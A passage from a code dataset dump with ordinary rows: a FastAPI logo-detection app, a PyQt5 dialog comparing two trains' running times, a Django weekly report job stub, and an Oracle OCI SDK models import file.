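    assert "Welcome" in response.json()["message"]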
| import uvicorn
from fastapi import FastAPI
from starlette_exporter import PrometheusMiddleware, handle_metrics
from api.extensions.utils import get_logger
from database.populate import main as populate_database
from routers import LogoRouter, DetectorRouter
app = FastAPI(
title="Lodetta",
description="Simple and easily deployable logo detection API written in Python",
version="0.1.0"
)
app.add_middleware(PrometheusMiddleware)
app.add_route("/metrics", handle_metrics)
@app.on_event("startup")
async def startup():
populate_database()
@app.get("/", tags=["Root"])
async def root():
return {"message": "Welcome to lodetta - simple logo detection API."}
app.include_router(LogoRouter, tags=["Logo"], prefix="/logo")
app.include_router(DetectorRouter, tags=["Detector"], prefix="/detector")
if __name__ == '__main__':
uvicorn.run(app, port=8080, host='0.0.0.0')
| none | 1 | 2.125019 | 2 | |
libs/train_graph/train_graph/trainComparator.py | denglihong2007/Parsing_12306 | 1 | 6616658 | <gh_stars>1-10
"""
Dialog for comparing the running data of two trains.
"""
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import Qt
from .data.train import Train
from .data.graph import Graph,Train,Line
class TrainComparator(QtWidgets.QDialog):
def __init__(self,graph:Graph,parent=None):
super(TrainComparator, self).__init__(parent)
self.resize(600,600)
self.setWindowTitle('车次运行对照')
self.graph = graph
self.train1 = None
self.train2 = None
self.initWidget()
def initWidget(self):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel("本功能对比两车次在本线各区间运行数据,两车次皆不经过的区间将被省略。"
"若车次跨越中间车站,则该区间数据不会显示。两者不同的区间,背景红色是较快的"
"一方,蓝色是较慢的一方。颜色深浅由差异程度决定。")
label.setWordWrap(True)
layout.addWidget(label)
hlayout = QtWidgets.QHBoxLayout()
combo1 = QtWidgets.QComboBox(self)
combo2 = QtWidgets.QComboBox(self)
self.combo1 = combo1
self.combo2 = combo2
combo1.addItem('请选择车次')
combo1.setEditable(True)
combo2.addItem('请选择车次')
combo2.setEditable(True)
for train in self.graph.trains():
combo1.addItem(train.fullCheci())
combo2.addItem(train.fullCheci())
hlayout.addWidget(combo1)
hlayout.addWidget(QtWidgets.QLabel('—'))
hlayout.addWidget(combo2)
layout.addLayout(hlayout)
combo1.currentTextChanged.connect(self._train1_changed)
combo2.currentTextChanged.connect(self._train2_changed)
tableWidget = QtWidgets.QTableWidget(self)
self.tableWidget = tableWidget
tableWidget.setColumnCount(7)
tableWidget.setHorizontalHeaderLabels(('区间','历时1','均速1','附加1','历时2','均速2','附加2'))
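        # Columns (added note): 0 = interval "A->B"; 1-3 = duration, average speed and
        # stop/pass marks for train 1; 4-6 = the same three values for train 2.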
for i,s in enumerate((120,80,80,60,80,80,60)):
tableWidget.setColumnWidth(i,s)
self.tableWidget.setEditTriggers(tableWidget.NoEditTriggers)
layout.addWidget(tableWidget)
self.setLayout(layout)
def setTableWidget(self):
self.tableWidget.setRowCount(0)
if self.train1 is None and self.train2 is None:
return
self.addDirData(True)
self.addDirData(False)
checis = [train.fullCheci() if train is not None else 'null' for train in (self.train1,self.train2)]
self.setWindowTitle('车次运行对照*{}-{}'.format(*checis))
def addDirData(self,down:bool):
previous = None
for st_dict in self.graph.stationDicts(reverse=not down):
if previous is None:
                # the first and last stations are always served in both directions, so no need to check
previous = st_dict
continue
if not st_dict.get('direction', Line.BothVia) &(Line.DownVia if down else Line.UpVia):
continue
mile = st_dict['licheng'] - previous['licheng']
if not down:
mile = -mile
try:
sec1 = self.train1.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm1_str = f"{int(sec1/60)}:{sec1%60:02d}"
except:
sec1 = 0
tm1_str = '-'
if sec1 > 3600*24-sec1:
sec1 = 0
tm1_str = '-'
if sec1:
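                # (added note) assuming licheng is in kilometres: 1000*mile/sec1 gives m/s,
                # and *3.6 converts it to km/h for the displayed average speed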
speed1 = 1000 * mile / sec1 * 3.6
speed1_str = f"{speed1:.2f}"
self.train1:Train
append_str1 = self.train1.stationStopBehaviour_single(previous['zhanming'],True)+\
self.train1.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed1 = 0
speed1_str = '-'
append_str1 = '-'
try:
sec2 = self.train2.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm2_str = f"{int(sec2/60)}:{sec2%60:02d}"
except:
sec2 = 0
tm2_str = '-'
if sec2 > 3600*24-sec2:
sec2 = 0
tm2_str = '-'
if sec2:
speed2 = 1000 * mile / sec2 * 3.6
speed2_str = f"{speed2:.2f}"
append_str2 = self.train2.stationStopBehaviour_single(previous['zhanming'],True) + \
self.train2.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed2 = 0
speed2_str = '-'
append_str2 = '-'
if not sec1 and not sec2:
previous = st_dict
continue
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
self.tableWidget.setRowHeight(row,self.graph.UIConfigData()['table_row_height'])
self.tableWidget.setItem(row,0,
QtWidgets.QTableWidgetItem(f"{previous['zhanming']}->{st_dict['zhanming']}"))
item1 = QtWidgets.QTableWidgetItem(tm1_str)
item2 = QtWidgets.QTableWidgetItem(speed1_str)
item3 = QtWidgets.QTableWidgetItem(append_str1)
item4 = QtWidgets.QTableWidgetItem(tm2_str)
item5 = QtWidgets.QTableWidgetItem(speed2_str)
item6 = QtWidgets.QTableWidgetItem(append_str2)
if sec1 and sec2 and sec1 != sec2:
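                # (added note) both trains cover the interval in different times: scale the
                # background alpha with the relative gap so larger differences look more
                # saturated, red marking the faster train and blue the slower one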
alpha1 = abs(sec1-sec2)/sec1*200+55
alpha2 = abs(sec1-sec2)/sec2*200+55
if sec1 < sec2:
color1 = QtGui.QColor(Qt.red)
color2 = QtGui.QColor(Qt.blue)
else:
color1 = QtGui.QColor(Qt.blue)
color2 = QtGui.QColor(Qt.red)
color1.setAlpha(alpha1)
color2.setAlpha(alpha2)
item1.setBackground(QtGui.QBrush(color1))
item2.setBackground(QtGui.QBrush(color1))
item3.setBackground(QtGui.QBrush(color1))
item4.setBackground(QtGui.QBrush(color2))
item5.setBackground(QtGui.QBrush(color2))
item6.setBackground(QtGui.QBrush(color2))
for i,s in enumerate((item1,item2,item3,item4,item5,item6)):
self.tableWidget.setItem(row,i+1,s)
previous = st_dict
# slots
def _train1_changed(self,checi):
if checi == '请选择车次':
self.train1 = None
else:
self.train1 = self.graph.trainFromCheci(checi,True)
self.setTableWidget()
def _train2_changed(self,checi):
if checi == '请选择车次':
self.train2 = None
else:
self.train2 = self.graph.trainFromCheci(checi,True)
self.setTableWidget() | """
Dialog for comparing the running data of two trains.
"""
from PyQt5 import QtWidgets,QtGui,QtCore
from PyQt5.QtCore import Qt
from .data.train import Train
from .data.graph import Graph,Train,Line
class TrainComparator(QtWidgets.QDialog):
def __init__(self,graph:Graph,parent=None):
super(TrainComparator, self).__init__(parent)
self.resize(600,600)
self.setWindowTitle('车次运行对照')
self.graph = graph
self.train1 = None
self.train2 = None
self.initWidget()
def initWidget(self):
layout = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel("本功能对比两车次在本线各区间运行数据,两车次皆不经过的区间将被省略。"
"若车次跨越中间车站,则该区间数据不会显示。两者不同的区间,背景红色是较快的"
"一方,蓝色是较慢的一方。颜色深浅由差异程度决定。")
label.setWordWrap(True)
layout.addWidget(label)
hlayout = QtWidgets.QHBoxLayout()
combo1 = QtWidgets.QComboBox(self)
combo2 = QtWidgets.QComboBox(self)
self.combo1 = combo1
self.combo2 = combo2
combo1.addItem('请选择车次')
combo1.setEditable(True)
combo2.addItem('请选择车次')
combo2.setEditable(True)
for train in self.graph.trains():
combo1.addItem(train.fullCheci())
combo2.addItem(train.fullCheci())
hlayout.addWidget(combo1)
hlayout.addWidget(QtWidgets.QLabel('—'))
hlayout.addWidget(combo2)
layout.addLayout(hlayout)
combo1.currentTextChanged.connect(self._train1_changed)
combo2.currentTextChanged.connect(self._train2_changed)
tableWidget = QtWidgets.QTableWidget(self)
self.tableWidget = tableWidget
tableWidget.setColumnCount(7)
tableWidget.setHorizontalHeaderLabels(('区间','历时1','均速1','附加1','历时2','均速2','附加2'))
for i,s in enumerate((120,80,80,60,80,80,60)):
tableWidget.setColumnWidth(i,s)
self.tableWidget.setEditTriggers(tableWidget.NoEditTriggers)
layout.addWidget(tableWidget)
self.setLayout(layout)
def setTableWidget(self):
self.tableWidget.setRowCount(0)
if self.train1 is None and self.train2 is None:
return
self.addDirData(True)
self.addDirData(False)
checis = [train.fullCheci() if train is not None else 'null' for train in (self.train1,self.train2)]
self.setWindowTitle('车次运行对照*{}-{}'.format(*checis))
def addDirData(self,down:bool):
previous = None
for st_dict in self.graph.stationDicts(reverse=not down):
if previous is None:
                # the first and last stations are always served in both directions, so no need to check
previous = st_dict
continue
if not st_dict.get('direction', Line.BothVia) &(Line.DownVia if down else Line.UpVia):
continue
mile = st_dict['licheng'] - previous['licheng']
if not down:
mile = -mile
try:
sec1 = self.train1.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm1_str = f"{int(sec1/60)}:{sec1%60:02d}"
except:
sec1 = 0
tm1_str = '-'
if sec1 > 3600*24-sec1:
sec1 = 0
tm1_str = '-'
if sec1:
speed1 = 1000 * mile / sec1 * 3.6
speed1_str = f"{speed1:.2f}"
self.train1:Train
append_str1 = self.train1.stationStopBehaviour_single(previous['zhanming'],True)+\
self.train1.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed1 = 0
speed1_str = '-'
append_str1 = '-'
try:
sec2 = self.train2.gapBetweenStation(previous['zhanming'], st_dict['zhanming'])
tm2_str = f"{int(sec2/60)}:{sec2%60:02d}"
except:
sec2 = 0
tm2_str = '-'
if sec2 > 3600*24-sec2:
sec2 = 0
tm2_str = '-'
if sec2:
speed2 = 1000 * mile / sec2 * 3.6
speed2_str = f"{speed2:.2f}"
append_str2 = self.train2.stationStopBehaviour_single(previous['zhanming'],True) + \
self.train2.stationStopBehaviour_single(st_dict['zhanming'],False)
else:
speed2 = 0
speed2_str = '-'
append_str2 = '-'
if not sec1 and not sec2:
previous = st_dict
continue
row = self.tableWidget.rowCount()
self.tableWidget.insertRow(row)
self.tableWidget.setRowHeight(row,self.graph.UIConfigData()['table_row_height'])
self.tableWidget.setItem(row,0,
QtWidgets.QTableWidgetItem(f"{previous['zhanming']}->{st_dict['zhanming']}"))
item1 = QtWidgets.QTableWidgetItem(tm1_str)
item2 = QtWidgets.QTableWidgetItem(speed1_str)
item3 = QtWidgets.QTableWidgetItem(append_str1)
item4 = QtWidgets.QTableWidgetItem(tm2_str)
item5 = QtWidgets.QTableWidgetItem(speed2_str)
item6 = QtWidgets.QTableWidgetItem(append_str2)
if sec1 and sec2 and sec1 != sec2:
alpha1 = abs(sec1-sec2)/sec1*200+55
alpha2 = abs(sec1-sec2)/sec2*200+55
if sec1 < sec2:
color1 = QtGui.QColor(Qt.red)
color2 = QtGui.QColor(Qt.blue)
else:
color1 = QtGui.QColor(Qt.blue)
color2 = QtGui.QColor(Qt.red)
color1.setAlpha(alpha1)
color2.setAlpha(alpha2)
item1.setBackground(QtGui.QBrush(color1))
item2.setBackground(QtGui.QBrush(color1))
item3.setBackground(QtGui.QBrush(color1))
item4.setBackground(QtGui.QBrush(color2))
item5.setBackground(QtGui.QBrush(color2))
item6.setBackground(QtGui.QBrush(color2))
for i,s in enumerate((item1,item2,item3,item4,item5,item6)):
self.tableWidget.setItem(row,i+1,s)
previous = st_dict
# slots
def _train1_changed(self,checi):
if checi == '请选择车次':
self.train1 = None
else:
self.train1 = self.graph.trainFromCheci(checi,True)
self.setTableWidget()
def _train2_changed(self,checi):
if checi == '请选择车次':
self.train2 = None
else:
self.train2 = self.graph.trainFromCheci(checi,True)
self.setTableWidget() | zh | 0.983061 | 两车次比较的对话框 # 第一个和最后一个站肯定是双向通过,不用试 # slots | 2.902761 | 3 |
apps/hq/jobs/weekly/supervisor_report.py | commtrack/commtrack-old-to-del | 1 | 6616659 | <gh_stars>1-10
from django_extensions.management.jobs import WeeklyJob
import hq.reporter as reporter
class Job(WeeklyJob):
help = "Supervisor Weekly Report Job."
def _doEmailReports(self):
pass
def _doSMSReports(self):
pass
def execute(self):
reporter.run_reports('weekly')
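        # Usage note (added): with django-extensions installed, this weekly job can be
        # triggered manually with, for example:
        #   python manage.py runjob supervisor_report
        #   python manage.py runjobs weekly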
| from django_extensions.management.jobs import WeeklyJob
import hq.reporter as reporter
class Job(WeeklyJob):
help = "Supervisor Weekly Report Job."
def _doEmailReports(self):
pass
def _doSMSReports(self):
pass
def execute(self):
reporter.run_reports('weekly') | none | 1 | 1.721618 | 2 | |
src/oci/database_management/models/__init__.py | Manny27nyc/oci-python-sdk | 249 | 6616660 | <gh_stars>100-1000
# coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .activity_time_series_metrics import ActivityTimeSeriesMetrics
from .add_managed_database_to_managed_database_group_details import AddManagedDatabaseToManagedDatabaseGroupDetails
from .allowed_parameter_value import AllowedParameterValue
from .associated_database_collection import AssociatedDatabaseCollection
from .associated_database_summary import AssociatedDatabaseSummary
from .awr_db_collection import AwrDbCollection
from .awr_db_cpu_usage_collection import AwrDbCpuUsageCollection
from .awr_db_cpu_usage_summary import AwrDbCpuUsageSummary
from .awr_db_metric_collection import AwrDbMetricCollection
from .awr_db_metric_summary import AwrDbMetricSummary
from .awr_db_parameter_change_collection import AwrDbParameterChangeCollection
from .awr_db_parameter_change_summary import AwrDbParameterChangeSummary
from .awr_db_parameter_collection import AwrDbParameterCollection
from .awr_db_parameter_summary import AwrDbParameterSummary
from .awr_db_report import AwrDbReport
from .awr_db_snapshot_collection import AwrDbSnapshotCollection
from .awr_db_snapshot_range_collection import AwrDbSnapshotRangeCollection
from .awr_db_snapshot_range_summary import AwrDbSnapshotRangeSummary
from .awr_db_snapshot_summary import AwrDbSnapshotSummary
from .awr_db_sql_report import AwrDbSqlReport
from .awr_db_summary import AwrDbSummary
from .awr_db_sysstat_collection import AwrDbSysstatCollection
from .awr_db_sysstat_summary import AwrDbSysstatSummary
from .awr_db_top_wait_event_collection import AwrDbTopWaitEventCollection
from .awr_db_top_wait_event_summary import AwrDbTopWaitEventSummary
from .awr_db_wait_event_bucket_collection import AwrDbWaitEventBucketCollection
from .awr_db_wait_event_bucket_summary import AwrDbWaitEventBucketSummary
from .awr_db_wait_event_collection import AwrDbWaitEventCollection
from .awr_db_wait_event_summary import AwrDbWaitEventSummary
from .awr_query_result import AwrQueryResult
from .change_database_parameter_details import ChangeDatabaseParameterDetails
from .change_database_parameters_details import ChangeDatabaseParametersDetails
from .change_db_management_private_endpoint_compartment_details import ChangeDbManagementPrivateEndpointCompartmentDetails
from .change_job_compartment_details import ChangeJobCompartmentDetails
from .change_managed_database_group_compartment_details import ChangeManagedDatabaseGroupCompartmentDetails
from .child_database import ChildDatabase
from .cluster_cache_metric import ClusterCacheMetric
from .create_db_management_private_endpoint_details import CreateDbManagementPrivateEndpointDetails
from .create_job_details import CreateJobDetails
from .create_managed_database_group_details import CreateManagedDatabaseGroupDetails
from .create_sql_job_details import CreateSqlJobDetails
from .database_credentials import DatabaseCredentials
from .database_fleet_health_metrics import DatabaseFleetHealthMetrics
from .database_home_metric_definition import DatabaseHomeMetricDefinition
from .database_home_metrics import DatabaseHomeMetrics
from .database_io_aggregate_metrics import DatabaseIOAggregateMetrics
from .database_instance_home_metrics_definition import DatabaseInstanceHomeMetricsDefinition
from .database_parameter_summary import DatabaseParameterSummary
from .database_parameter_update_status import DatabaseParameterUpdateStatus
from .database_parameters_collection import DatabaseParametersCollection
from .database_storage_aggregate_metrics import DatabaseStorageAggregateMetrics
from .database_time_aggregate_metrics import DatabaseTimeAggregateMetrics
from .database_usage_metrics import DatabaseUsageMetrics
from .datafile import Datafile
from .db_management_private_endpoint import DbManagementPrivateEndpoint
from .db_management_private_endpoint_collection import DbManagementPrivateEndpointCollection
from .db_management_private_endpoint_summary import DbManagementPrivateEndpointSummary
from .fleet_metric_definition import FleetMetricDefinition
from .fleet_metric_summary_definition import FleetMetricSummaryDefinition
from .fleet_status_by_category import FleetStatusByCategory
from .fleet_summary import FleetSummary
from .instance_details import InstanceDetails
from .job import Job
from .job_collection import JobCollection
from .job_database import JobDatabase
from .job_execution import JobExecution
from .job_execution_collection import JobExecutionCollection
from .job_execution_result_details import JobExecutionResultDetails
from .job_execution_result_location import JobExecutionResultLocation
from .job_execution_summary import JobExecutionSummary
from .job_executions_status_summary import JobExecutionsStatusSummary
from .job_executions_status_summary_collection import JobExecutionsStatusSummaryCollection
from .job_run import JobRun
from .job_run_collection import JobRunCollection
from .job_run_summary import JobRunSummary
from .job_schedule_details import JobScheduleDetails
from .job_summary import JobSummary
from .managed_database import ManagedDatabase
from .managed_database_collection import ManagedDatabaseCollection
from .managed_database_group import ManagedDatabaseGroup
from .managed_database_group_collection import ManagedDatabaseGroupCollection
from .managed_database_group_summary import ManagedDatabaseGroupSummary
from .managed_database_summary import ManagedDatabaseSummary
from .memory_aggregate_metrics import MemoryAggregateMetrics
from .metric_data_point import MetricDataPoint
from .metric_dimension_definition import MetricDimensionDefinition
from .object_storage_job_execution_result_details import ObjectStorageJobExecutionResultDetails
from .object_storage_job_execution_result_location import ObjectStorageJobExecutionResultLocation
from .parent_group import ParentGroup
from .pdb_metrics import PdbMetrics
from .pdb_status_details import PdbStatusDetails
from .remove_managed_database_from_managed_database_group_details import RemoveManagedDatabaseFromManagedDatabaseGroupDetails
from .reset_database_parameters_details import ResetDatabaseParametersDetails
from .sql_job import SqlJob
from .tablespace import Tablespace
from .tablespace_collection import TablespaceCollection
from .tablespace_summary import TablespaceSummary
from .time_series_metric_data_point import TimeSeriesMetricDataPoint
from .time_series_metric_definition import TimeSeriesMetricDefinition
from .update_database_parameters_result import UpdateDatabaseParametersResult
from .update_db_management_private_endpoint_details import UpdateDbManagementPrivateEndpointDetails
from .update_job_details import UpdateJobDetails
from .update_managed_database_group_details import UpdateManagedDatabaseGroupDetails
from .update_sql_job_details import UpdateSqlJobDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_request_summary import WorkRequestSummary
# Maps type names to classes for database_management services.
database_management_type_mapping = {
"ActivityTimeSeriesMetrics": ActivityTimeSeriesMetrics,
"AddManagedDatabaseToManagedDatabaseGroupDetails": AddManagedDatabaseToManagedDatabaseGroupDetails,
"AllowedParameterValue": AllowedParameterValue,
"AssociatedDatabaseCollection": AssociatedDatabaseCollection,
"AssociatedDatabaseSummary": AssociatedDatabaseSummary,
"AwrDbCollection": AwrDbCollection,
"AwrDbCpuUsageCollection": AwrDbCpuUsageCollection,
"AwrDbCpuUsageSummary": AwrDbCpuUsageSummary,
"AwrDbMetricCollection": AwrDbMetricCollection,
"AwrDbMetricSummary": AwrDbMetricSummary,
"AwrDbParameterChangeCollection": AwrDbParameterChangeCollection,
"AwrDbParameterChangeSummary": AwrDbParameterChangeSummary,
"AwrDbParameterCollection": AwrDbParameterCollection,
"AwrDbParameterSummary": AwrDbParameterSummary,
"AwrDbReport": AwrDbReport,
"AwrDbSnapshotCollection": AwrDbSnapshotCollection,
"AwrDbSnapshotRangeCollection": AwrDbSnapshotRangeCollection,
"AwrDbSnapshotRangeSummary": AwrDbSnapshotRangeSummary,
"AwrDbSnapshotSummary": AwrDbSnapshotSummary,
"AwrDbSqlReport": AwrDbSqlReport,
"AwrDbSummary": AwrDbSummary,
"AwrDbSysstatCollection": AwrDbSysstatCollection,
"AwrDbSysstatSummary": AwrDbSysstatSummary,
"AwrDbTopWaitEventCollection": AwrDbTopWaitEventCollection,
"AwrDbTopWaitEventSummary": AwrDbTopWaitEventSummary,
"AwrDbWaitEventBucketCollection": AwrDbWaitEventBucketCollection,
"AwrDbWaitEventBucketSummary": AwrDbWaitEventBucketSummary,
"AwrDbWaitEventCollection": AwrDbWaitEventCollection,
"AwrDbWaitEventSummary": AwrDbWaitEventSummary,
"AwrQueryResult": AwrQueryResult,
"ChangeDatabaseParameterDetails": ChangeDatabaseParameterDetails,
"ChangeDatabaseParametersDetails": ChangeDatabaseParametersDetails,
"ChangeDbManagementPrivateEndpointCompartmentDetails": ChangeDbManagementPrivateEndpointCompartmentDetails,
"ChangeJobCompartmentDetails": ChangeJobCompartmentDetails,
"ChangeManagedDatabaseGroupCompartmentDetails": ChangeManagedDatabaseGroupCompartmentDetails,
"ChildDatabase": ChildDatabase,
"ClusterCacheMetric": ClusterCacheMetric,
"CreateDbManagementPrivateEndpointDetails": CreateDbManagementPrivateEndpointDetails,
"CreateJobDetails": CreateJobDetails,
"CreateManagedDatabaseGroupDetails": CreateManagedDatabaseGroupDetails,
"CreateSqlJobDetails": CreateSqlJobDetails,
"DatabaseCredentials": DatabaseCredentials,
"DatabaseFleetHealthMetrics": DatabaseFleetHealthMetrics,
"DatabaseHomeMetricDefinition": DatabaseHomeMetricDefinition,
"DatabaseHomeMetrics": DatabaseHomeMetrics,
"DatabaseIOAggregateMetrics": DatabaseIOAggregateMetrics,
"DatabaseInstanceHomeMetricsDefinition": DatabaseInstanceHomeMetricsDefinition,
"DatabaseParameterSummary": DatabaseParameterSummary,
"DatabaseParameterUpdateStatus": DatabaseParameterUpdateStatus,
"DatabaseParametersCollection": DatabaseParametersCollection,
"DatabaseStorageAggregateMetrics": DatabaseStorageAggregateMetrics,
"DatabaseTimeAggregateMetrics": DatabaseTimeAggregateMetrics,
"DatabaseUsageMetrics": DatabaseUsageMetrics,
"Datafile": Datafile,
"DbManagementPrivateEndpoint": DbManagementPrivateEndpoint,
"DbManagementPrivateEndpointCollection": DbManagementPrivateEndpointCollection,
"DbManagementPrivateEndpointSummary": DbManagementPrivateEndpointSummary,
"FleetMetricDefinition": FleetMetricDefinition,
"FleetMetricSummaryDefinition": FleetMetricSummaryDefinition,
"FleetStatusByCategory": FleetStatusByCategory,
"FleetSummary": FleetSummary,
"InstanceDetails": InstanceDetails,
"Job": Job,
"JobCollection": JobCollection,
"JobDatabase": JobDatabase,
"JobExecution": JobExecution,
"JobExecutionCollection": JobExecutionCollection,
"JobExecutionResultDetails": JobExecutionResultDetails,
"JobExecutionResultLocation": JobExecutionResultLocation,
"JobExecutionSummary": JobExecutionSummary,
"JobExecutionsStatusSummary": JobExecutionsStatusSummary,
"JobExecutionsStatusSummaryCollection": JobExecutionsStatusSummaryCollection,
"JobRun": JobRun,
"JobRunCollection": JobRunCollection,
"JobRunSummary": JobRunSummary,
"JobScheduleDetails": JobScheduleDetails,
"JobSummary": JobSummary,
"ManagedDatabase": ManagedDatabase,
"ManagedDatabaseCollection": ManagedDatabaseCollection,
"ManagedDatabaseGroup": ManagedDatabaseGroup,
"ManagedDatabaseGroupCollection": ManagedDatabaseGroupCollection,
"ManagedDatabaseGroupSummary": ManagedDatabaseGroupSummary,
"ManagedDatabaseSummary": ManagedDatabaseSummary,
"MemoryAggregateMetrics": MemoryAggregateMetrics,
"MetricDataPoint": MetricDataPoint,
"MetricDimensionDefinition": MetricDimensionDefinition,
"ObjectStorageJobExecutionResultDetails": ObjectStorageJobExecutionResultDetails,
"ObjectStorageJobExecutionResultLocation": ObjectStorageJobExecutionResultLocation,
"ParentGroup": ParentGroup,
"PdbMetrics": PdbMetrics,
"PdbStatusDetails": PdbStatusDetails,
"RemoveManagedDatabaseFromManagedDatabaseGroupDetails": RemoveManagedDatabaseFromManagedDatabaseGroupDetails,
"ResetDatabaseParametersDetails": ResetDatabaseParametersDetails,
"SqlJob": SqlJob,
"Tablespace": Tablespace,
"TablespaceCollection": TablespaceCollection,
"TablespaceSummary": TablespaceSummary,
"TimeSeriesMetricDataPoint": TimeSeriesMetricDataPoint,
"TimeSeriesMetricDefinition": TimeSeriesMetricDefinition,
"UpdateDatabaseParametersResult": UpdateDatabaseParametersResult,
"UpdateDbManagementPrivateEndpointDetails": UpdateDbManagementPrivateEndpointDetails,
"UpdateJobDetails": UpdateJobDetails,
"UpdateManagedDatabaseGroupDetails": UpdateManagedDatabaseGroupDetails,
"UpdateSqlJobDetails": UpdateSqlJobDetails,
"WorkRequest": WorkRequest,
"WorkRequestCollection": WorkRequestCollection,
"WorkRequestError": WorkRequestError,
"WorkRequestErrorCollection": WorkRequestErrorCollection,
"WorkRequestLogEntry": WorkRequestLogEntry,
"WorkRequestLogEntryCollection": WorkRequestLogEntryCollection,
"WorkRequestResource": WorkRequestResource,
"WorkRequestSummary": WorkRequestSummary
}
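# Illustrative sketch (added): a mapping like the one above is typically used to resolve an
# API type name to its model class during deserialization. The helper name below is
# hypothetical and not part of the generated SDK.
def _resolve_model_class(type_name):
    """Return the model class registered under ``type_name``, or None if it is unknown."""
    return database_management_type_mapping.get(type_name)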
| # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from __future__ import absolute_import
from .activity_time_series_metrics import ActivityTimeSeriesMetrics
from .add_managed_database_to_managed_database_group_details import AddManagedDatabaseToManagedDatabaseGroupDetails
from .allowed_parameter_value import AllowedParameterValue
from .associated_database_collection import AssociatedDatabaseCollection
from .associated_database_summary import AssociatedDatabaseSummary
from .awr_db_collection import AwrDbCollection
from .awr_db_cpu_usage_collection import AwrDbCpuUsageCollection
from .awr_db_cpu_usage_summary import AwrDbCpuUsageSummary
from .awr_db_metric_collection import AwrDbMetricCollection
from .awr_db_metric_summary import AwrDbMetricSummary
from .awr_db_parameter_change_collection import AwrDbParameterChangeCollection
from .awr_db_parameter_change_summary import AwrDbParameterChangeSummary
from .awr_db_parameter_collection import AwrDbParameterCollection
from .awr_db_parameter_summary import AwrDbParameterSummary
from .awr_db_report import AwrDbReport
from .awr_db_snapshot_collection import AwrDbSnapshotCollection
from .awr_db_snapshot_range_collection import AwrDbSnapshotRangeCollection
from .awr_db_snapshot_range_summary import AwrDbSnapshotRangeSummary
from .awr_db_snapshot_summary import AwrDbSnapshotSummary
from .awr_db_sql_report import AwrDbSqlReport
from .awr_db_summary import AwrDbSummary
from .awr_db_sysstat_collection import AwrDbSysstatCollection
from .awr_db_sysstat_summary import AwrDbSysstatSummary
from .awr_db_top_wait_event_collection import AwrDbTopWaitEventCollection
from .awr_db_top_wait_event_summary import AwrDbTopWaitEventSummary
from .awr_db_wait_event_bucket_collection import AwrDbWaitEventBucketCollection
from .awr_db_wait_event_bucket_summary import AwrDbWaitEventBucketSummary
from .awr_db_wait_event_collection import AwrDbWaitEventCollection
from .awr_db_wait_event_summary import AwrDbWaitEventSummary
from .awr_query_result import AwrQueryResult
from .change_database_parameter_details import ChangeDatabaseParameterDetails
from .change_database_parameters_details import ChangeDatabaseParametersDetails
from .change_db_management_private_endpoint_compartment_details import ChangeDbManagementPrivateEndpointCompartmentDetails
from .change_job_compartment_details import ChangeJobCompartmentDetails
from .change_managed_database_group_compartment_details import ChangeManagedDatabaseGroupCompartmentDetails
from .child_database import ChildDatabase
from .cluster_cache_metric import ClusterCacheMetric
from .create_db_management_private_endpoint_details import CreateDbManagementPrivateEndpointDetails
from .create_job_details import CreateJobDetails
from .create_managed_database_group_details import CreateManagedDatabaseGroupDetails
from .create_sql_job_details import CreateSqlJobDetails
from .database_credentials import DatabaseCredentials
from .database_fleet_health_metrics import DatabaseFleetHealthMetrics
from .database_home_metric_definition import DatabaseHomeMetricDefinition
from .database_home_metrics import DatabaseHomeMetrics
from .database_io_aggregate_metrics import DatabaseIOAggregateMetrics
from .database_instance_home_metrics_definition import DatabaseInstanceHomeMetricsDefinition
from .database_parameter_summary import DatabaseParameterSummary
from .database_parameter_update_status import DatabaseParameterUpdateStatus
from .database_parameters_collection import DatabaseParametersCollection
from .database_storage_aggregate_metrics import DatabaseStorageAggregateMetrics
from .database_time_aggregate_metrics import DatabaseTimeAggregateMetrics
from .database_usage_metrics import DatabaseUsageMetrics
from .datafile import Datafile
from .db_management_private_endpoint import DbManagementPrivateEndpoint
from .db_management_private_endpoint_collection import DbManagementPrivateEndpointCollection
from .db_management_private_endpoint_summary import DbManagementPrivateEndpointSummary
from .fleet_metric_definition import FleetMetricDefinition
from .fleet_metric_summary_definition import FleetMetricSummaryDefinition
from .fleet_status_by_category import FleetStatusByCategory
from .fleet_summary import FleetSummary
from .instance_details import InstanceDetails
from .job import Job
from .job_collection import JobCollection
from .job_database import JobDatabase
from .job_execution import JobExecution
from .job_execution_collection import JobExecutionCollection
from .job_execution_result_details import JobExecutionResultDetails
from .job_execution_result_location import JobExecutionResultLocation
from .job_execution_summary import JobExecutionSummary
from .job_executions_status_summary import JobExecutionsStatusSummary
from .job_executions_status_summary_collection import JobExecutionsStatusSummaryCollection
from .job_run import JobRun
from .job_run_collection import JobRunCollection
from .job_run_summary import JobRunSummary
from .job_schedule_details import JobScheduleDetails
from .job_summary import JobSummary
from .managed_database import ManagedDatabase
from .managed_database_collection import ManagedDatabaseCollection
from .managed_database_group import ManagedDatabaseGroup
from .managed_database_group_collection import ManagedDatabaseGroupCollection
from .managed_database_group_summary import ManagedDatabaseGroupSummary
from .managed_database_summary import ManagedDatabaseSummary
from .memory_aggregate_metrics import MemoryAggregateMetrics
from .metric_data_point import MetricDataPoint
from .metric_dimension_definition import MetricDimensionDefinition
